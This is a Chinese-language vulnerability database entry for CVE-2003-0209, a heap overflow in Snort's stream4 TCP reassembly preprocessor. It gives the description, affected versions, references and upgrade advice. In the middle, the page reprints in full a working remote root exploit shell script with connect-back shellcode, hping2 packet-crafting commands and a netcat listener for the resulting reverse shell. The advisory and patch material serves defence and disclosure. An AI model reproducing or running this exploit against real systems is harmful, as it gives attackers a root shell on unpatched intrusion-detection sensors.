CVE-2003-0209
CVSS10.0
发布时间 :2003-05-05 00:00:00
修订时间 :2016-10-17 22:30:41
NMCOES    

[原文]Integer overflow in the TCP stream reassembly module (stream4) for Snort 2.0 and earlier allows remote attackers to execute arbitrary code via large sequence numbers in packets, which enable a heap-based buffer overflow.


[CNNVD]Snort TCP流重组预处理器远程整数溢出导致堆缓冲区溢出漏洞(CNNVD-200305-004)

        
        Snort是一个开放源码的流行的网络入侵检测系统。
        stream4预处理模块在计算重组数据流偏移时存在一个整数溢出,远程攻击者可以利用这个漏洞对Snort进程堆缓冲区溢出攻击,可能以Snort进程权限在系统上执行任意指令。
        stream4预处理模块是Snort在进行包分析前重组TCP通信的一个插件,也可以用于探测多种类型的IDS逃避攻击。这个模块在计算重组数据流偏移时会溢出一个32位整数变量,可导致基于堆的破坏。要利用这个漏洞,攻击者不需要知道Snort探测器所运行的主机,只要精心构建TCP包就可能以Snort进程权限(通常是root)在系统上执行任意指令。
        

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:sourcefire:snort:1.8.5
cpe:/a:sourcefire:snort:1.8.3
cpe:/a:sourcefire:snort:1.8
cpe:/a:sourcefire:snort:1.8.6
cpe:/a:sourcefire:snort:1.8.1
cpe:/a:sourcefire:snort:1.8.2
cpe:/a:sourcefire:snort:1.9.1
cpe:/a:smoothwall:smoothwall:2.0_beta_4
cpe:/a:sourcefire:snort:1.8.4
cpe:/a:sourcefire:snort:1.8.7
cpe:/a:sourcefire:snort:1.9

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0209
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0209
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200305-004
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=105043563016235&w=2
(UNKNOWN)  BUGTRAQ  20030415 CORE-2003-0307: Snort TCP Stream Reassembly Integer Overflow Vulnerability
http://marc.info/?l=bugtraq&m=105103586927007&w=2
(UNKNOWN)  BUGTRAQ  20030422 GLSA: snort (200304-05)
http://marc.info/?l=bugtraq&m=105111217731583&w=2
(UNKNOWN)  BUGTRAQ  20030423 Snort <=1.9.1 exploit
http://marc.info/?l=bugtraq&m=105154530427824&w=2
(UNKNOWN)  BUGTRAQ  20030428 GLSA: snort (200304-06)
http://marc.info/?l=bugtraq&m=105172790914107&w=2
(UNKNOWN)  ENGARDE  ESA-20030430-013
http://www.cert.org/advisories/CA-2003-13.html
(UNKNOWN)  CERT  CA-2003-13
http://www.coresecurity.com/common/showdoc.php?idx=313&idxseccion=10
(UNKNOWN)  MISC  http://www.coresecurity.com/common/showdoc.php?idx=313&idxseccion=10
http://www.debian.org/security/2003/dsa-297
(UNKNOWN)  DEBIAN  DSA-297
http://www.kb.cert.org/vuls/id/139129
(VENDOR_ADVISORY)  CERT-VN  VU#139129
http://www.mandriva.com/security/advisories?name=MDKSA-2003:052
(UNKNOWN)  MANDRAKE  MDKSA-2003:052
http://www.securityfocus.com/bid/7178
(VENDOR_ADVISORY)  BID  7178

- 漏洞信息

Snort TCP流重组预处理器远程整数溢出导致堆缓冲区溢出漏洞
危急 其他
2003-05-05 00:00:00 2006-08-24 00:00:00
远程  
        
        Snort是一个开放源码的流行的网络入侵检测系统。
        stream4预处理模块在计算重组数据流偏移时存在一个整数溢出,远程攻击者可以利用这个漏洞对Snort进程堆缓冲区溢出攻击,可能以Snort进程权限在系统上执行任意指令。
        stream4预处理模块是Snort在进行包分析前重组TCP通信的一个插件,也可以用于探测多种类型的IDS逃避攻击。这个模块在计算重组数据流偏移时会溢出一个32位整数变量,可导致基于堆的破坏。要利用这个漏洞,攻击者不需要知道Snort探测器所运行的主机,只要精心构建TCP包就可能以Snort进程权限(通常是root)在系统上执行任意指令。
        

- 公告与补丁

        厂商补丁:
        Martin Roesch
        -------------
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载使用Snort 2.0版本:
        
        http://www.snort.org/dl/snort-2.0.0.tar.gz

- 漏洞信息 (18)

Snort <=1.9.1 Remote Root Exploit (p7snort191.sh) (EDBID:18)
linux remote
2003-04-23 Verified
0 truff
N/A [点击下载]
#!/bin/sh

##########################################################
# p7snort191.sh by truff (truff@projet7.org)             #
# Snort 1.9.1 and below remote exploit                   #
#                                                        #
# Tested on Slackware 8.0 with Snort 1.9.1 from sources  #
#                                                        #
# Usage:                                                 #
# 1/ Launch a listening netcat to listen for the shell   #
# nc -p 45295 -l                                         #
#                                                        #
# 2/ p7snort119.sh yourIP [Ret_Addr]                     #
#                                                        #
# Where yourIP is the IP where the netcat is listening   #
# and Ret_Addr is the address (8 hexa digits) of the     #
# shellcode (eg: 0819fec2)                               #
#                                                        #
#                                                        #
# This vulnerability was discovered by Bruce Leidl,      #
# Juan Pablo Martinez Kuhn, and Alejandro David Weil     #
# from Core Security Technologies during Bugweek 2003.   #
#                                                        #
# Greetz to #root people and projet7 members.            #
# Special thx to mycroft for helping me with shell       #
# scripting stuff.                                       #
#                                                        #
# www.projet7.org - Security Researchs -                 #
##########################################################


# Put here the path to your hping2 binary
HPING2=/usr/sbin/hping2

# You should change these params to make the snort sensor 
# capture the packets.
IPSRC=192.168.22.1
IPDST=192.168.22.2
PTSRC=3339
PTDST=111



echo "p7snort191.sh by truff (truff@projet7.org)"

case $# in
0)
echo "Bad number of params"
echo "Read comments in sources"
exit -1
;;
1)
RET=0819fec2
echo "Using default retaddr (Slackware 8.0)"
echo $RET
;;
2)
RET=$2
echo "Using custom retaddr"
echo $RET
;;
*)
echo "Bad number of params"
echo "Read comments in sources"
exit -1
;;
esac



# Nops
i=0
while [ "$i" -lt "512" ]; do
i=$(expr "$i" + 1)
echo -n -e "\x90" >> egg
done


# linux x86 shellcode by eSDee of Netric (www.netric.org)
# 131 byte - connect back shellcode (port=0xb0ef)
echo -n -e "\x31\xc0\x31\xdb\x31\xc9\x51\xb1" >> egg
echo -n -e "\x06\x51\xb1\x01\x51\xb1\x02\x51" >> egg
echo -n -e "\x89\xe1\xb3\x01\xb0\x66\xcd\x80" >> egg
echo -n -e "\x89\xc2\x31\xc0\x31\xc9\x51\x51" >> egg
echo -n -e "\x68" >> egg

# IP here 
echo -n -e $(printf "\\\x%02x" $(echo $1 | cut -d. -f1) \
$(echo $1 | cut -d. -f2) \
$(echo $1 | cut -d. -f3) \
$(echo $1 | cut -d. -f4)) >> egg

echo -n -e "\x66\x68\xb0" >> egg
echo -n -e "\xef\xb1\x02\x66\x51\x89\xe7\xb3" >> egg
echo -n -e "\x10\x53\x57\x52\x89\xe1\xb3\x03" >> egg
echo -n -e "\xb0\x66\xcd\x80\x31\xc9\x39\xc1" >> egg 
echo -n -e "\x74\x06\x31\xc0\xb0\x01\xcd\x80" >> egg
echo -n -e "\x31\xc0\xb0\x3f\x89\xd3\xcd\x80" >> egg
echo -n -e "\x31\xc0\xb0\x3f\x89\xd3\xb1\x01" >> egg
echo -n -e "\xcd\x80\x31\xc0\xb0\x3f\x89\xd3" >> egg
echo -n -e "\xb1\x02\xcd\x80\x31\xc0\x31\xd2" >> egg
echo -n -e "\x50\x68\x6e\x2f\x73\x68\x68\x2f" >> egg
echo -n -e "\x2f\x62\x69\x89\xe3\x50\x53\x89" >> egg
echo -n -e "\xe1\xb0\x0b\xcd\x80\x31\xc0\xb0" >> egg
echo -n -e "\x01\xcd\x80" >> egg

# 3 dummy bytes for alignment purposes
echo -n -e "\x41\x41\x41" >> egg

i=0
cpt=$(expr 3840 - 134 - 512)
cpt=$(expr $cpt / 4)


var1=0x$(echo $RET | cut -b7,8)
var2=0x$(echo $RET | cut -b5,6)
var3=0x$(echo $RET | cut -b3,4)
var4=0x$(echo $RET | cut -b1,2)

while [ "$i" -lt "$cpt" ]; do
i=$(expr "$i" + 1)
echo -n -e $(printf "\\\x%02x" $var1 $var2 $var3 $var4) >> egg
done


# hping ruleZ
$HPING2 $IPDST -a $IPSRC -s $PTSRC -p $PTDST --ack --rst -c 1 \
-d 0x1 --setseq 0xffff0023 --setack 0xc0c4c014 \
1>/dev/null 2>/dev/null

$HPING2 $IPDST -a $IPSRC -s $PTSRC -p $PTDST --ack --rst -c 1 \
-d 0xF00 -E egg --setseq 0xffffffff --setack 0xc0c4c014 \
1>/dev/null 2>/dev/null

$HPING2 $IPSRC -a $IPDST -s $PTDST -p $PTSRC --ack -c 1 \
-d 0 --setseq 0xc0c4c014 --setack 0xffffffff \
1>/dev/null 2>/dev/null

rm egg

echo "Exploit Sended"

# milw0rm.com [2003-04-23]
		

- 漏洞信息

4444
Snort stream4 Reassemble Module Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Workaround, Upgrade
Exploit Public Vendor Verified

- 漏洞描述

Snort IDS contains a flaw that may allow a remote attacker to execute arbitrary code. The issue is due to a flaw in the stream4 reassemble module that does not properly sanitize input buffers. If an attacker sends a specially crafted set of packets they may be able to execute arbitrary code via a heap overflow.

- 时间线

2003-04-15 2003-03-03
2003-04-15 Unknow

- 解决方案

Upgrade to version 2.0 or higher, as it has been reported to fix this vulnerability. It is also possible to correct the flaw by implementing the following workaround: disable the stream4 preprocessor edit snort.conf, replace any lines that begin with "preprocessor stream4" with "# preprocessor stream4"

- 相关参考

- 漏洞作者

- 漏洞信息

Snort TCP Packet Reassembly Integer Overflow Vulnerability
Failure to Handle Exceptional Conditions 7178
Yes No
2003-04-15 12:00:00 2009-07-11 09:06:00
Discovery of this issue is credited to Bruce Leidl, Juan Pablo Martinez Kuhn and Alejandro David Weil from Core Security Technologies.

- 受影响的程序版本

Snort Project Snort 1.9.1
+ MandrakeSoft Corporate Server 2.1
+ MandrakeSoft Multi Network Firewall 2.0
+ Mandriva Linux Mandrake 9.1 ppc
+ Mandriva Linux Mandrake 9.1
+ Mandriva Linux Mandrake 9.0
+ Mandriva Linux Mandrake 8.2 ppc
+ Mandriva Linux Mandrake 8.2
Snort Project Snort 1.9
+ Gentoo Linux 1.4 _rc3
+ Gentoo Linux 1.4 _rc2
Snort Project Snort 1.8.7
Snort Project Snort 1.8.6
Snort Project Snort 1.8.5
Snort Project Snort 1.8.4 beta1
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0
Snort Project Snort 1.8.4
Snort Project Snort 1.8.3
Snort Project Snort 1.8.2
Snort Project Snort 1.8.1
Snort Project Snort 1.8
+ Conectiva Linux 8.0
SmoothWall SmoothWall 2.0 beta 4
Snort Project Snort 2.0 .0rc1
Snort Project Snort 2.0

- 不受影响的程序版本

Snort Project Snort 2.0 .0rc1
Snort Project Snort 2.0

- 漏洞讨论

A vulnerability has been discovered in Snort. The problem occurs during the reassembly of TCP packets by the stream4 preprocesser. By sending specially crafted fragmented packets across a network monitored by Snort, it may be possible to trigger an integer overflow. As a result, a buffer overflow may occur, effectively allowing a remote attacker to corrupt heap memory.

Successful exploitation of this issue could allow a remote attacker to execute arbitrary code on a target system.

This issue effects Snort releases prior to Snort 2.0 RC1.

- 漏洞利用

CORE has developed a working commercial exploit for their IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

An exploit has been made available by truff (truff@projet7.org)

- 解决方案

Conectiva Linux has released a security advisory (CLSA-2003:671) to address this issue. Fixes are available below. Users are advised to upgrade as soon as possible.

Guardian Digital Security has released a security advisory for EnGarde Secure Linux (ESA-20030430-013). The referenced advisory contains information pertaining to obtaining and applying fixes that address this issue. Users are advised to upgrade as soon as possible.

While NetBSD does not include Snort by default, Snort is available through pkgsrc. NetBSD users who have installed Snort packages should use pkgsrc/security/audit-packages to apply upgrades.

It is recommended that all Gentoo Linux users who are running
net-analyzer/snort upgrade to snort-2.0.0 as follows:

emerge sync
emerge snort
emerge clean

Mandrake has released a security advisory (MDKSA-2003:052) which contains fixes that address this issue. Users are advised to upgrade as soon as possible.

Debian has released a security advisory (DSA 297-1) containing fixes which address this issue. Users are advised to upgrade as soon as possible.

This issue is addressed in Snort 2.0. Users are advised to upgrade.

Fixes are available:


Snort Project Snort 1.8

Snort Project Snort 1.8.1

Snort Project Snort 1.8.2

Snort Project Snort 1.8.3

Snort Project Snort 1.8.4 beta1

Snort Project Snort 1.8.4

Snort Project Snort 1.8.5

Snort Project Snort 1.8.6

Snort Project Snort 1.8.7

Snort Project Snort 1.9

Snort Project Snort 1.9.1

SmoothWall SmoothWall 2.0 beta 4

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站